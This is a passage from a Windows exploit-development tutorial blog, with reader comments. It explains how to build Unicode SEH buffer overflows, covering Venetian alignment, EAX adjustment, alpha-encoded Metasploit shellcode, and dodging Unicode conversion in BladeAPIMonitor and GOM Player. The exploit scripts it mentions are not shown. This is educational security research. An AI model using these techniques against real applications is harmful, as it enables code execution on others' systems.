I want you to notice one more thing about the above screenshot. Look at the instruction at 0012ED38 (SUB EAX, 47004F00). This is actually our SEH POP+POP+RET address being executed as an instruction. Again, normally in traditional SEH exploits Next SEH is overwritten with a short jump that hops over the SEH address. However, in a Unicode exploit, not only does SEH have to be a valid POP+POP+RET address, but because we can’t issue a JMP, that address must also be able to successfully execute as its own instruction! In our case we got lucky, but it’s possible that the first address you try won’t execute properly and you’ll have to choose a different one.

Adjusting EAX

Once we move the address in ESI into EAX, we need to adjust it to get it to point to our shellcode. But what do we adjust it to? In my case, ESI points to 0x0012EAB0. Take a look below at an expanded view of the Memory Dump window:


That address is about 24 bytes from the start of our buffer. We know we have an additional 316d bytes of $junk + $nseh + $seh before we get to the $fill portion of our buffer. Multiply this by 2 to account for the Unicode nulls and you’ve got 632d. We’ll also take up some additional bytes with the ADD/SUB instructions and the corresponding Venetian padding. Since we can only ADD/SUB using increments of 100 we’ll need to adjust EAX by at least 300h (768d). We’ll need to fine tune it a bit, but let’s see where that gets us. First, let’s update the Perl script to incorporate the ADD/SUB instructions with the alternating venetian alignment instructions:

Trigger the exploit with the new buffer and you should see the net of the ADD/SUB instructions adjusts EAX by +300h (0012EDB0) as expected.


Take a look at the memory dump window and you should see that the current location of EAX is a total of 82 bytes (including nulls) from the end of our last $venalign instruction (\xc3) as represented by the highlighted section below.


This means we need to put another $junk2 buffer 41 bytes in length (to account for the inserted nulls) in front of our shellcode to ensure that EAX will point to the very first byte.

The Shellcode

Remember, we don’t really have any space constraints with this exploit so we can use a standard, alpha-encoded payload. I’ll use metasploit to generate it as follows:

If you notice, even though the formatting of the resulting shellcode is hex, it is only made up of alphanumeric characters. If you really want to convert this to the ASCII representation you can use the following one-liner:

Now that we have generated our shellcode, all we have to do is modify our exploit by adding it along with the additional $junk2 buffer and everything should work as planned. Here’s the final exploit script:

And the results:



Congrats, you’ve just successfully written two Unicode buffer overflow exploits. Read on to see a couple of quick examples of how you may be able to avoid Unicode altogether.

Avoiding Unicode

There are times when writing a working Unicode exploit is too much trouble or just isn’t possible because you can’t find the necessary Unicode-friendly addresses. Although it may not happen often, you may be able to avoid Unicode altogether by changing the format your input. Take for example, this alternate BladeAPIMonitor exploit by b33f (Ruben Boonen). He found that if he copy/pasted his buffer in Windows Notepad first, and then copied it into the application input it would be processed by the as standard ANSI/multibyte characters. If you followed along with my first Unicode exploit example you’ve already downloaded the application, so feel to give it a try.

I came across a similar situation when I discovered a vulnerability in GOM Player. The application stores Equalizer presets in the registry as REG_MULTI_SZ values.


The vulnerable version of GOM Player loads these values at run time but does not perform any bounds checking so any of them could be used to trigger a Unicode SEH Buffer Overflow (as shown below).


However, what I found was that if changed the registry entry type to REG_BINARY, I could avoid the Unicode conversion and my buffer would be processed as ANSI (ASCII).


Here is the resulting stack:

win_exploit_7_49All that I needed to do was have my exploit script create the buffer as a binary string in a reg file. This meant instead of using the standard \xBB hex format, I simply made every byte of the buffer comma delimited as follows:

I won’t walk through the entire exploit, but feel free to check out the previous link to download the application and try it out for yourself.

While avoiding Unicode may not always be possible, if you find yourself faced with a seemingly impossible Unicode exploit, try experimenting with your string formats to see if you can avoid the Unicode altogether.


In Windows, you are typically dealing with either ANSI (multibyte) or Unicode (wide) strings. Both ANSI and Unicode can represent ASCII characters, though each use a different encoding approach — ANSI uses multiple single and double-byte code pages and Unicode uses a consistent 2-byte encoding. The two exploit examples were meant to demonstrate how to construct a standard and SEH Unicode buffer overflow using encoded shellcode and alternating “Venetian” offset instructions. We even did a crash course on writing some (very rudimentary) shellcode to accomodate strict space constraints. Finally, I provided two examples of situations where Unicode may be avoided depending on how the buffer string is formatted. If you want to review anything click here to return to the top.

I hope you found this post informative and useful. As always, if you have any corrections, comments or questions, please feel free to leave them below — I look forward to hearing from you. I’ll be working on the next installment in this series as well as some other related posts in the coming weeks.

Until next time …  – Mike

Related Posts:

11 Comments add one

  1. metacom says:

    The best tutorials 2013-2014 🙂

    That’s well done!

    keep it up =D>

  2. NO-MERCY says:

    Hi . . Mike
    as Metacom said “The Best Win Exploitation Tutorials 2013\2014”
    Tell Him Let Me Reply First Once 🙂

    I’ll Prepare PDF’s Final Sooon
    & i have Some ???
    I Need Small Example About Brute force Aslr in WINDOWS !!
    What’s The Next Part ?

    Thank You So Much For That Great Job
    Kind Regards
    Greetings ..

    • Mike Czumak says:

      Thanks! As for the next part, I’m not quite sure. I’m currently working on a blind SQLi post. For the Win Exploit series plan to cover some other basics more in-depth such as DEP, ASLR, ROP, and shellcode before moving into kernel exploits and maybe some other topics such as UAC bypass. I also plan on making a corresponding series about Windows fundamentals — system calls, portions of the Win32 API, etc and I’m considering doing a series on reverse engineering on Windows. Of course all of this takes a lot of time and mine is pretty limited!

      Why Brute Force ASLR and for what version of Windows? I take it this would be for a scenario where there are no non-aslr modules loaded? Unless you know otherwise, I feel the chance of success of a brute-force attack against a modern implementation of ASLR in Windows is pretty low (though it is technically possible). You have to consider not only the predictability of the addresses but also the response of the target vulnerable application/service (e.g. will it crash?).

  3. tk says:

    Best exploit dev tutorial out there. Many thanks and looking forward for the next.

  4. vaampz says:

    you the pro man 🙂

  5. NO-MERCY says:

    Hello Mike :

    Part 7 Now Available As PDF
    Sorry 4 This Long Time
    Hope To Find It Useful & Any Suggest

    Link :

    CRC32: 0E78627C
    MD5: 08AD6EB5017A2DE7F32AEB4920D32757

    previous Parts here 🙁 Shared Folder )

    Kind Regards

  6. Iran Eduardo says:

    Oh! Thanks you for these great tuts.

    What windows 7 you use in these tutorials, 32 or 64 bits?